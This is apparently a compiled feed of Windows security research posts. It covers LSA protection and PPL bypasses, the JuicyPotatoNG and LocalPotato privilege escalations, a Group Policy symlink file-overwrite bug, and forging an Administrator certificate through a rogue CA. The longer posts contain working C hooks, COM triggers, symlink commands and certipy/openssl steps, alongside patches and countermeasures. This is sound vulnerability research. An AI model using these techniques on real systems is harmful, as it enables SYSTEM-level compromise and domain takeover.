Do You Really Know About LSA Protection (RunAsPPL)?

By: itm4n
6 April 2021 at 22:00
When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days. Introdu...

Fuzzing Windows RPC with RpcView

By: itm4n
31 July 2021 at 22:00
The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area. RPC as a Fuzzing Target? As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX sy...

From RpcView to PetitPotam

By: itm4n
1 September 2021 at 22:00
In the previous post we saw how to set up a Windows 10 machine in order to manually analyze Windows RPC with RpcView. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool. The Theory Before diving into the main subject, I need to discuss so...

Bypassing LSA Protection in Userland

By: itm4n
21 April 2021 at 22:00
In 2018, James Forshaw published an article in which he briefly mentioned a trick that could be used to inject arbitrary code into a PPL as an administrator. However, I feel like this post did not get the attention it deserved as it literally described a potential Userland exploit for bypassing PPL (which includes LSA Protection). Introduction I was doing some research on Protected Processes ...

The End of PPLdump

By: itm4n
23 July 2022 at 22:00
A few days ago, an issue was opened for PPLdump on GitHub, stating that it no longer worked on Windows 10 21H2 Build 19044.1826. I was skeptical at first so I fired up a new VM and started investigating. Here is what I found… PPLdump in a nutshell If you are reading this, I would assume that you already know what PPLdump is and what it does. But just in case you do not, here is a very brief s...

Giving JuicyPotato a second chance: JuicyPotatoNG

By: Decoder
21 September 2022 at 17:07

Well, it’s been a long time since our beloved JuicyPotato was published. In the meantime, things changed and got fixed (backported also to Win10 1803/Server 2016), leading to the glorious end of this tool, which made it possible to elevate to the SYSTEM user by abusing impersonation privileges on Windows systems.

With Juicy2 it was somehow possible to circumvent the protections MS decided to implement in order to stop this evil abuse, but there were some constraints, for example requiring an external non-Windows machine to redirect the OXID resolution requests.

The subset of CLSIDs to abuse was very restricted (most of them would give us an Identification token); in fact, it worked only on Windows 10/11 versions with the “ActiveX Installer Service”. The “PrintNotify” service was also a good candidate (enabled also on Windows Server versions), but it required belonging to the “INTERACTIVE” group, which in practice limited the abuse from service accounts.

When James Forshaw published his post about relaying Kerberos DCOM authentication, which is also an evolution of our “RemotePotato0”, we reconsidered these limitations, given that he demonstrated it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw’s “trick” for resolving OXID requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to “System” in order to bypass the Windows Firewall restrictions (if enabled) and decided to use port 10247 as the default, given that in our tests this port was generally available locally to a low-privileged user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When calling the LogonUser() API with logon type 9 (NewCredentials), LSASS will build a copy of our token and add the INTERACTIVE SID along with others, e.g. the SID of the newly created logon session. Because we created this token through LogonUser() with explicit credentials, we don’t need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn’t matter, as they will only be used over the network, while the original caller identity will be used locally.
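
A minimal sketch of this trick follows; the credentials are placeholders and can be anything, as explained above.

#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")

int wmain(void)
{
    HANDLE hToken = NULL;

    // LOGON32_LOGON_NEW_CREDENTIALS (type 9) only affects outbound network authentication,
    // so the username/domain/password can be arbitrary; locally we keep our own identity,
    // but the resulting token carries the INTERACTIVE SID among others.
    if (!LogonUserW(L"FakeUser", L"FakeDomain", L"FakePassword",
                    LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken))
    {
        wprintf(L"LogonUserW failed: %lu\r\n", GetLastError());
        return 1;
    }

    // Impersonating a token we created ourselves does not require SeImpersonatePrivilege
    if (ImpersonateLoggedOnUser(hToken))
    {
        // ... perform the COM activation while impersonating ...
        RevertToSelf();
    }

    CloseHandle(hToken);
    return 0;
}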

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible. When we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime binds to the specified port, and this port becomes “busy” for anyone else trying to use it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that would have been an unnecessarily heavy load of code.

So we decided to implement an SSPI hook on the AcceptSecurityContext() function, which allows us to intercept the authentication and get the SYSTEM token to impersonate:

Using an SSPI hook instead of relying on RpcImpersonateClient() has the additional advantage of making this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know, RpcImpersonateClient() requires your process to hold SeImpersonatePrivilege, so that would have added an unnecessary limitation.
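
For illustration only, here is one way such a hook could look. This is a sketch, not the authors’ actual implementation, and it assumes the server-side RPC runtime dispatches AcceptSecurityContext() through the shared SecurityFunctionTable returned by InitSecurityInterfaceW().

#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#pragma comment(lib, "secur32.lib")

static ACCEPT_SECURITY_CONTEXT_FN g_OriginalAcceptSecurityContext = NULL;
static HANDLE g_hClientToken = NULL;

// Wrapper installed in place of AcceptSecurityContext(): forward the call, and once the
// handshake is complete, grab the token of the authenticated (SYSTEM) client.
SECURITY_STATUS SEC_ENTRY HookedAcceptSecurityContext(PCredHandle phCredential, PCtxtHandle phContext,
    PSecBufferDesc pInput, unsigned long fContextReq, unsigned long TargetDataRep,
    PCtxtHandle phNewContext, PSecBufferDesc pOutput, unsigned long *pfContextAttr, PTimeStamp ptsExpiry)
{
    SECURITY_STATUS status = g_OriginalAcceptSecurityContext(phCredential, phContext, pInput,
        fContextReq, TargetDataRep, phNewContext, pOutput, pfContextAttr, ptsExpiry);

    if (status == SEC_E_OK)
        QuerySecurityContextToken(phNewContext, &g_hClientToken);

    return status;
}

void InstallSspiHook(void)
{
    // Assumption: the RPC runtime resolves AcceptSecurityContext() through this table
    PSecurityFunctionTableW pTable = InitSecurityInterfaceW();
    DWORD dwOldProtect;

    VirtualProtect(&pTable->AcceptSecurityContext, sizeof(PVOID), PAGE_READWRITE, &dwOldProtect);
    g_OriginalAcceptSecurityContext = pTable->AcceptSecurityContext;
    pTable->AcceptSecurityContext = HookedAcceptSecurityContext;
    VirtualProtect(&pTable->AcceptSecurityContext, sizeof(PVOID), dwOldProtect, &dwOldProtect);
}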

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG, written in C++ with Visual Studio 2019, can be downloaded here.

The Port problem

As mentioned, we chose “10247” as the default COM server port, but sometimes you can run into a situation where the port is not available. The following simple PowerShell script will help you find the available ports: just choose one that is not already in use and you’re done.
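
As a rough equivalent in C (a sketch, not the PowerShell script referenced above), a candidate port can simply be probed by attempting to bind it on the loopback interface:

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

// Returns TRUE if nothing is already bound on 127.0.0.1:<port>
BOOL IsTcpPortAvailable(USHORT port)
{
    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) return FALSE;

    SOCKADDR_IN addr = { 0 };
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    BOOL available = (bind(s, (SOCKADDR*)&addr, sizeof(addr)) == 0);
    closesocket(s);
    return available;
}

int main(void)
{
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    // Probe a small range of candidate ports around the default one
    for (USHORT port = 10240; port < 10260; port++)
        if (IsTcpPortAvailable(port))
            printf("Port %u seems available\n", port);
    WSACleanup();
    return 0;
}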

Countermeasures

Be aware that MS does not consider this a “security boundary” violation: abusing impersonation privileges is expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts with these privileges should be protected by strong passwords and strict access policies, and in the case of service accounts, “virtual service accounts” or “Group Managed Service Accounts” should be used. You could also consider removing unnecessary privileges, as described in one of my posts, but this is not totally secure either…

In this particular case, just disabling the “ActiveX Installer Service” and the “Print Notify Service” will inhibit our exploit (and has no serious impact). But remember, there could be third-party CLSIDs with SYSTEM impersonation too…

Conclusions

This post is the demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft “fixed” the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what, there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

Runs only on win11/2022…

Authors of this post: @decoder_it, @splinter_code

Debugging Protected Processes

By: itm4n
3 December 2022 at 23:00
Whenever I need to debug a protected process, I usually disable the protection in the Kernel so that I can attach a User-mode debugger. This has always served me well until it sort of backfired. The problem with protected processes The problem with protected processes, when it comes to debugging, is basically that they are… protected. Jokes aside, this means that, as you know, you cannot atta...

Insomni'hack 2023 CTF Teaser - InsoBug

By: itm4n
25 January 2023 at 23:00
For this edition of Insomni’hack, I wanted to create a special challenge based on my knowledge of some Windows internals. In this post, I will share some thoughts about the process and, most importantly, provide a detailed write-up. Personal thoughts I want to start this post by sharing a few thoughts on CTFs and the process of creating a challenge. If you want to skip this part, feel free to...

LocalPotato – When Swapping The Context Leads You To SYSTEM

By: Decoder
13 February 2023 at 10:23

Here we are again with our (me and @splinter_code) new *potato flavor, the LocalPotato! This was a cool finding so we decided to create a dedicated website 😉

The journey to discovering the LocalPotato began with a hint from our friend Elad Shamir, who suggested examining the “Reserved” field in NTLM Challenge messages for potential exploitation opportunities.

After extensive research, we ended up with “LocalPotato”, a not-so-common NTLM reflection attack against local authentication allowing arbitrary file read/write. Combining this arbitrary file write primitive with code execution allowed us to achieve a full-chain elevation of privilege from user to SYSTEM.

We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022, and it was resolved with the release of the January 2023 patch Tuesday and assigned the CVE number CVE-2023-21746.


Local NTLM Authentication

The NTLM authentication mechanism is part of the NTLMSSP (NTLM Security Support Provider), which is supported by the Windows security framework called SSPI (Security Support Provider Interface).
SSPI provides a flexible API for handling authentication tokens and supports several underlying providers, including NTLMSSP, SPNEGO, Kerberos, etc…

The NTLM authentication process involves the exchange of three types of messages (Type 1, Type 2, and Type 3) between the client and the server, processed by the NTLMSSP.
The SSPI authentication handshake abstracts away the details of NTLM and allows for a mechanism-independent means of applying authentication, integrity, and confidentiality primitives.

Local authentication is a special case of NTLM authentication in which the client and server are on the same machine.
The client acquires the credentials of the logged-in user and creates the Type 1 message, which contains the workstation and domain name of the client.
The server examines the domain and workstation information and initiates local authentication if they match.
The client then receives the Type 2 message from the server and checks the presence of the “Negotiate Local Call” flag to determine if the security context handle is valid.
If it is, the default credentials are associated with the server context, and the resulting Type 3 message is empty.
The server then verifies that the security context is bound to a user, and if so, authentication is complete.

In summary, during local authentication, the “Reserved” field of the NTLM Type 2 message (which is normally set to zero for non-local authentication) references the local server context handle that the client should associate with.

In the above figure, we have highlighted the Reserved field containing the upper value of the context handle.

The Logic Bug

NTLM authentication through SSPI is often misunderstood to involve direct mutual authentication between the client and the server. However, in reality, the local authenticator (LSASS) is always involved, acting as the intermediary between the two.
It is responsible for creating the messages, checking the identity permissions, and generating the proper tokens.

The objective of our research was to intercept a local NTLM authentication as a non-privileged local or domain user, and “swap” the contexts (NTLM “Reserved” field) with that of a privileged user (e.g. by coercing an authentication). 

This would allow us to authenticate against a server service with these credentials, effectively exchanging the identity of our low-privileged user with a more privileged entity like SYSTEM. If successful, this would indicate that there are no checks in place to validate the Context exchanged between the two parties involved in the authentication.

The attack flow is as follows:

  • Coerce the authentication of a privileged user against our server.
  • Initiate an NTLM authentication of our client against a server service.
  • Interception of the context “B” (Reserved bytes) of the NTLM Type 2 message coming from the server service where our unprivileged client is trying to authenticate.
  • Retrieval of the context “A” (Reserved bytes) of the NTLM Type 2 message produced by our server when the privileged client tries to authenticate.
  • Swap context A with B so that the privileged client will authenticate against the server service on behalf of the unprivileged client and vice versa.
  • Retrieve both NTLM Type 3 empty response messages and forward them in the correct order to complete both authentication processes.
  • As a result of the context swap, the Local Security Authority Subsystem (LSASS) will associate context B with the privileged identity and context A with the unprivileged identity. This results in the swap of contexts, allowing our malicious client to authenticate on behalf of the privileged user.

Below is a graphical representation of the attack flow:

To validate our assumptions about the context swap attack, we set up a custom scenario.
In our experiment, we used two socket servers and two socket clients to authenticate via NTLM with different users and exchange each other’s “context”.
Both parties negotiated the NTLM authentication over a socket through SSPI:
the clients with two calls to InitializeSecurityContext() and the servers with two calls to AcceptSecurityContext().
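
To give an idea of the SSPI side of this experiment, here is a stripped-down sketch of the client half producing the first NTLM token; the socket I/O, the follow-up InitializeSecurityContext() call and the server-side AcceptSecurityContext() counterpart are omitted.

#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#pragma comment(lib, "secur32.lib")

// Produces the first NTLM token (Type 1) for the current user; the token written to pOut
// would then be sent over the socket to the server side of the experiment.
BOOL NtlmClientStep1(CredHandle *phCred, CtxtHandle *phCtx, PBYTE pOut, DWORD *pcbOut)
{
    TimeStamp tsExpiry;
    SecBuffer OutBuf = { *pcbOut, SECBUFFER_TOKEN, pOut };
    SecBufferDesc OutDesc = { SECBUFFER_VERSION, 1, &OutBuf };
    ULONG ulAttrs = 0;

    // Use the caller's default credentials with the NTLM package
    if (AcquireCredentialsHandleW(NULL, (SEC_WCHAR*)L"NTLM", SECPKG_CRED_OUTBOUND,
            NULL, NULL, NULL, NULL, phCred, &tsExpiry) != SEC_E_OK)
        return FALSE;

    // The target name (SPN) is the third parameter; in the SMB scenario described later,
    // this is where "cifs/127.0.0.1" matters for the anti-reflection check.
    SECURITY_STATUS status = InitializeSecurityContextW(phCred, NULL, NULL,
        ISC_REQ_CONNECTION, 0, SECURITY_NATIVE_DREP, NULL, 0,
        phCtx, &OutDesc, &ulAttrs, &tsExpiry);

    *pcbOut = OutBuf.cbBuffer;
    // SEC_I_CONTINUE_NEEDED is expected: the Type 2 / Type 3 exchange follows
    return (status == SEC_I_CONTINUE_NEEDED || status == SEC_E_OK);
}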

After some adjustments, we successfully swapped identities and were able to trick LSASS into associating the context with the “wrong” server.

To exploit this in a real-world scenario, we then had to find a useful trigger for coercing a privileged client and an appropriate server service.

The Triggers for coercing a privileged client

Based on our previous research, we identified two key triggers for coercing a privileged client: the BITS service attempting to authenticate as the SYSTEM user via HTTP on port 5985 (WinRM), and authenticated RPC/DCOM privileged user calls.

RogueWinRM is a technique that takes advantage of the BITS service’s attempt to authenticate as the SYSTEM user via HTTP on port 5985. Since this port is not enabled by default on Windows 10/11, it provides an opportunity to implement a custom HTTP server that can capture the authentication flow. This allows us to obtain SYSTEM-level authentication.

RemotePotato0 is a method for coercing privileged authentication on a target machine by taking advantage of standard COM marshaling. In our scenario, we discovered three interesting default CLSIDs that authenticate as SYSTEM:

  1. CLSID: {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
    The ActiveX Installer Service “AxInstSv” is available only on Windows 10/11.
  2. CLSID: {854A20FB-2D44-457D-992F-EF13785D2B51}
    The Printer Extensions and Notifications Service “PrintNotify” is available on Windows 10/11 and Server 2016/2019/2022.
  3. CLSID: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
    The Universal Print Management Service “McpManagementService” is available on Windows 11 and Server 2022.

By leveraging one of these triggers, we could obtain a suitable privileged identity to abuse.

Exploiting a server service 

Initially, we tried to find a privileged candidate for our server service by examining the exposed RPC services, such as the Service Control Manager. However, we encountered a problem with local authentication to RPC services, as it is not possible to perform any reflection or relay attacks due to mitigations in the RPC runtime library (rpcrt4.dll).

As explained in this blog post by James Forshaw, Microsoft has added a mitigation in the RPC runtime to prevent authentication relay attacks from being successful.
This is done in “SSECURITY_CONTEXT::ValidateUpgradeCriteria()” by checking if the authentication for an RPC connection came from the local system, and if so, setting a flag in the security context. The server will then reject the RPC call if this flag is set, before any code is called in the server. The only way to bypass this check is to either have authentication from a non-local system or have an authentication level of RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or higher, which requires knowledge of the session key for signing or encryption and thus effectively mitigates any relaying attempt.

Next, we turned our attention to the SMB server, with the goal of performing an arbitrary file write with elevated privileges. 

The only requirement was that the SMB server should not require signing, which is the default for servers that are not Domain Controllers. 

However, we found that the SMB protocol also has some mitigations in place to prevent cross-protocol reflection attacks. 

This mitigation, also referred to as CVE-2016-3225, was released to address the WebDAV->SMB relaying attack scenario.

Basically, it requires the use of the SPN “cifs/127.0.0.1” when initializing local authentication through InitializeSecurityContext() for connecting to the SMB server, even for authentication protocols other than Kerberos, such as NTLM.

The main idea behind this mitigation is to prevent relaying local authentication between two different protocols, which would result in an SPN mismatch in the authenticator and ultimately lead to an access denied error.

According to James Forshaw’s article “Windows Exploitation Tricks: Relaying DCOM Authentication“, it is possible to trick a privileged DCOM client into using an arbitrary Service Principal Name (SPN) to forge an arbitrary Kerberos ticket.
While this applies to Kerberos, it turns out that it also affects the SPN setting in an NTLM authentication.
For this reason, we chose the RPC/DCOM trigger for coercing a privileged client, because we could return an arbitrary SPN in the binding strings of the OXID resolver, thus bypassing the SMB anti-reflection mechanism.
All we needed to do was set an SPN of “cifs/127.0.0.1” in the originating privileged client, which was not a problem thanks to our trigger:

In the end, we were able to write an arbitrary file with SYSTEM privileges and arbitrary contents.
The network capture of the SMB packets shows us successfully authenticating to the C$ share as the SYSTEM user and overwriting the file PrintConfig.dll:

The POC

Creating a proof of concept for LocalPotato was a challenging task as it required writing SMB packets and sending them through the loopback interface for low-level NTLM authentication, accessing the local share, and finally writing a file.
We relied on Wireshark captures and Microsoft’s MS-SMB2 protocol specifications to complete the process. After multiple tests and code adjustments, we were finally successful.


To simplify the attack chain, we opted to eliminate the redirection to a non-Windows machine listening on port 135 and instead have the fake oxid resolver running on the Windows victim machine, so that the Potato trigger is local and the whole attack chain is fully local.

Just like we did in JuicyPotatoNG, we leveraged the SSPI hooks to manipulate the NTLM messages coming to our COM server from the privileged client, enabling the context swapping.

There are various methods to weaponize an arbitrary file write into code execution as SYSTEM, such as using an XPS Print Job or NetMan DLL Hijacking. So you are free to combine the LocalPotato primitive with what you prefer 😉

Converting an arbitrary file write into EoP is relatively straightforward.
In our case, we utilized the McpManagementService CLSID on a Windows Server 2022 machine, overwrote the PrintConfig.dll library, and instantiated the PrintNotify object.
This forced the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:
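
For reference, triggering the DLL load boils down to a single out-of-process COM activation of the PrintNotify class (a sketch; the CLSID is the PrintNotify one listed in the trigger section above):

#include <windows.h>
#include <objbase.h>
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "uuid.lib")

int wmain(void)
{
    // CLSID of the "PrintNotify" service class (see the trigger list above)
    CLSID clsid;
    IUnknown *pUnk = NULL;

    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    CLSIDFromString(L"{854A20FB-2D44-457D-992F-EF13785D2B51}", &clsid);

    // Activating the class out-of-process starts the service, which in turn
    // loads PrintConfig.dll -- by now replaced with our own DLL.
    HRESULT hr = CoCreateInstance(&clsid, NULL, CLSCTX_LOCAL_SERVER, &IID_IUnknown, (void**)&pUnk);

    if (SUCCEEDED(hr) && pUnk)
        pUnk->lpVtbl->Release(pUnk);

    CoUninitialize();
    return 0;
}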

The LocalPotato POC is available at → https://github.com/decoder-it/LocalPotato

The Patch

The main focus of the analysis was the function SsprHandleChallengeMessage(), which handles NTLM challenges. 

The LocalPotato vulnerability was found in the NTLM authentication scheme. To locate the source of the vulnerability, we conducted a binary diff analysis of msv1_0.dll, the security package loaded into LSASS to handle all NTLM-related operations:

We observed the addition of a new check for the enabled feature “Feature_MSRC74246_Servicing_NTLM_ServiceBinding_ContextSwapping” when authentication occurs:

The check introduced by Microsoft ensures that if the ISC_REQ_UNVERIFIED_TARGET_NAME flag is set and an SPN is present, the SPN is set to NULL. 

This change effectively addresses the vulnerability by disrupting this specific exploitation scenario. 

The SMB anti-reflection mechanism checks for the presence of a specific SPN, such as “cifs/127.0.0.1”, to determine whether to allow or deny access. With the patch in place, a NULL value will be found, thus denying the authentication.
It’s important to note that the ISC_REQ_UNVERIFIED_TARGET_NAME flag is passed and used by the DCOM privileged client, but prior to this patch, it was not taken into consideration for NTLM authentication.

Microsoft has released patches for supported versions of Windows, but don’t worry if you have an older version. 0patch provides fixes for LocalPotato for unsupported versions as well!

Conclusion

In conclusion, the LocalPotato vulnerability highlights the weaknesses of the NTLM authentication scheme in local authentication. 

Microsoft has resolved the issue with the release of the patch CVE-2023-21746, but this fix may just be a workaround as detecting forged context handles in the NTLM protocol may be difficult.

It is important to note that this type of attack is not specific to the SMB or RPC protocols, but rather a general weakness in the authentication flow.
Other protocols that use NTLM as authentication method may still be vulnerable, provided exploitable services can be found.

What’s next?

Well, to be honest, we ran out of ideas. But for sure, if we’ll find something new it will be the “Golden Potato”!

Acknowledgments

Our thanks go to these two top security researchers:

  • Elad Shamir (@elad_shamir), who gave us the initial idea and with whom we constantly discussed and debated this topic

  • James Forshaw (@tiraniddo), who gave us useful hints when everything seemed to be lost

EoP via Arbitrary File Write/Overwrite in Group Policy Client “gpsvc” – CVE-2022-37955

By: Decoder
16 February 2023 at 14:11

Summary

A standard domain user can exploit an arbitrary file write/overwrite as NT AUTHORITY\SYSTEM under certain circumstances if a Group Policy “Files” preference is configured. I reported this finding to ZDI, and Microsoft fixed it in CVE-2022-37955.

Versions Affected

Tests (April 06, 2022) were conducted on the following Active Directory setup:

  • Domain computer: Windows 10/Windows 11 & Windows Insider 11/Windows Member Server 2022,  latest releases and fully patched
  • Domain controller: Windows Server 2016/2019/2022 with Active Directory functional level 2016

Prerequisites                          

A  Files preference Domain Group Policy has to be configured.

According to Microsoft this policy allows you to:

If such a policy is configured and a standard user has write access to the source and destination folder (not so uncommon scenario), it is possible to perform file write/overwrite with SYSTEM privileges by abusing symlinks thus elevating privileges to Administrator/SYSTEM.

A standard user can easily verify the presence and configuration of such a policy by looking for “Files.xml” in the SYSVOL share of the domain controllers.
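A quick way to hunt for these policies from any domain-joined machine (a sketch, assuming a hypothetical mylab.local domain):

Get-ChildItem -Path \\mylab.local\SYSVOL\mylab.local\Policies -Recurse -Filter Files.xml -ErrorAction SilentlyContinue |
    Select-String -Pattern 'fromPath','targetPath'   # GPP Files.xml stores the source/destination in these attributes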

GPO Setup

To achieve arbitrary file write exploitation, a new “Files” preference Group Policy has to be created.

The following screenshot shows the setup of the policy:

In this example, the policy will copy the file source.dat from c:\sourcedir to dest.dat in c:\destdir.

The key point here is that these operations are performed without impersonation, running under the SYSTEM context.

Arbitrary File Write                              

Due to the incorrect handling of links created via Windows Object Manager symbolic links, it is possible to exploit this operation and place user-controlled content in any SYSTEM-protected location.

Exploitation steps

  1. Create the directories if they do not exist and ensure “destdir” is empty
  2. Copy a malicious dll/exe or whatever in c:\sourcedir with the name “source.dat”
  3. Create a symbolic link redirecting the destination file destdir\dest.dat to a system-protected location (see the sketch after these steps)
  4. Perform a gpupdate /force
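Step 3 can be sketched with James Forshaw’s symboliclink-testing-tools (the tools are real, the exact arguments are assumed). The trick is a mount point to the \RPC Control object directory plus an object manager symbolic link; c:\destdir must be empty for the mount point to be created:

CreateMountPoint.exe C:\destdir "\RPC Control"
CreateSymlink.exe "\RPC Control\dest.dat" C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll

With this in place, the copy performed at step 4 lands on PrintConfig.dll instead of C:\destdir\dest.dat.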

As can be noticed from the previous screenshot, the domain user was able to copy a file into a system-protected directory while controlling both its contents and its name. The Procmon screenshot confirms the operations:

Having the possibility to create a user-controlled file in protected directories opens endless privilege escalation possibilities. One of the easiest ways is to overwrite “Printconfig.dll” located in “C:\Windows\System32\spool\drivers\x64\3” with the malicious dll, and instantiate the PrintNotify object which will force the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

To replicate the findings in this report, Defender was disabled.

Possible causes

A possible root cause can be identified in a function located in gpprefcl.dll, which does not properly check for the presence of junction points and symlinks:

The Fix                           

Microsoft enforced the Redirection Guard for the Group Policy Client to prevent a process from following a junction point if it was created with a lower integrity level.


This successfully resolved all the security issues with Group Policy processing, many of which had been reported and partially addressed.

That’s all 😉

Bypassing PPL in Userland (again)

By: itm4n
16 March 2023 at 23:00
This post is a sequel to Bypassing LSA Protection in Userland and The End of PPLdump. Here, I will discuss how I was able to bypass the latest mitigation implemented by Microsoft and develop a new Userland exploit for injecting arbitrary code in a PPL with the highest signer type. The current state of PP(L)s My previous work on protected processes (see Bypassing LSA Protection in Userland) yi...

From NTAuthCertificates to “Silver” Certificate

By: Decoder
5 September 2023 at 16:22

In a recent assessment, I found that a user without special privileges had the ability to make changes to the NTAuthCertificates object. This misconfiguration piqued my curiosity, as I wanted to understand how this could potentially be exploited or misused.

Having write access to the NTAuthCertificates object in Windows Active Directory, which is located in the Configuration Partition, could potentially have significant consequences, as it involves the management of digital certificates used for authentication and security purposes.

The idea behind a possible abuse is to create a deceptive self-signed Certification Authority (CA) certificate and include it in the NTAuthCertificates object. As a result, any fraudulent certificates signed by this deceptive certificate will be considered legitimate. This technique, along with the Golden Certificate, which requires the knowledge of the Active Directory Certification Server (ADCS) private key, has been mentioned in the well-known research Certified Pre-Owned published a couple of years ago.

In this blog post, I will document the necessary steps and prerequisites needed for forging and abusing authentication certificates on behalf of any user obtained from a fake CA.

So this is the scenario, reproduced in my lab with the adsiedit.exe tool

If you prefer to do it with the command line, in this case, Powershell, with the ActiveDirectory module installed:

$user = Get-ADuser user11
$dn="AD:CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mylab,DC=local"
$acl = Get-Acl $dn
$sid = $user.SID
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid,"GenericAll","ALLOW",([GUID]("00000000-0000-0000-0000-000000000000")).guid,"All",([GUID]("00000000-0000-0000-0000-000000000000")).guid))
Set-Acl $dn $acl
(get-acl -path $dn).access

Now that we are aware that our user (user11 in this case), has control over this object, we first need to create a fake self-signed Certification Authority. This can be easily done with openssl tools.

#generate a private key for signing certificates:
openssl genrsa -out myfakeca.key 2048
#create and self sign the root certificate:
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 -out myfakeca.crt

When self-signing the root certificate, you can leave all the requested information empty except the common name, which should reflect your fake CA name, as shown in the figure below:

We need to add the public key of our fake CA (myfakeca.crt) to the cACertificate attribute stored in the NTAuthCertificates object, which defines one or more CAs that can be used during authentication. This can be done easily with the built-in certutil tool:
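A sketch of the command, using the file names from above:

certutil -dspublish -f myfakeca.crt NTAuthCA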

Let’s check if it worked:

Yes, it worked: we now have 2 entries! Now that we have added our fake CA cert, we also need to create the corresponding PFX file, which will be used later by the exploitation tools.

cat myfakeca.key > myfakeca.pem
cat myfakeca.crt >> myfakeca.pem
openssl pkcs12 -in myfakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out myfakeca.pfx

Everything is set up, so we can try to forge a certificate for authenticating as the Domain Admin. In this example, we will use the certipy tool, but you could also use the ForgeCert tool on Windows machines.

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'

Once we get the forged cert let’s try to authenticate:

certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

Hmmm, this was somewhat expected. The certificate is not trusted; we probably need to add our fake CA to the trusted certification authorities on the DC. But wait, this means that you need high privileges to do this, so we have to abandon the idea of any kind of privilege escalation and instead think of this technique as a possible persistence mechanism. Let’s add it to the DC:

Bad news: when we try to authenticate again, we still get the error message KDC_ERROR_CLIENT_NOT_TRUSTED.

What’s happening? Well, maybe the change in NTAuthCertificates has not been reflected on the DC’s local cache (we updated it as a standard user on a domain-joined PC) which is located under the registry key:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

On the DC, we have only one entry that corresponds to the legitimate CA. Normally this entry is aligned with the group policy update, so we could force the update without waiting for the next run (had some issues as it did not always work, needs more investigation) or run certutil to populate the cache:
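A possible way to populate the local cache directly on the DC (a sketch; certutil -pulse should also trigger the synchronization):

certutil -enterprise -addstore NTAuth myfakeca.crt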

Looks good, so now it should work. But guess what, bad news again! KDC_ERROR_CLIENT_NOT_TRUSTED

What’s still wrong? After some research, I figured out that the problem might be the Certificate Revocation List (CRL), which is checked on a regular basis, or at least the first time we use a certificate produced by the new CA. So we have to configure a CRL distribution point for the fake CA, which luckily can again be done with openssl ;).

First of all, we need to create a ca.conf file. I did this on my Linux box.

[ca]
default_ca = MYFAKECA
[crl_ext]
authorityKeyIdentifier=keyid:always
[MYFAKECA]
unique_subject = no
certificate = ./myfakeca.crt
database = ./certindex
private_key = ./myfakeca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
[myca_policy]
commonName = supplied
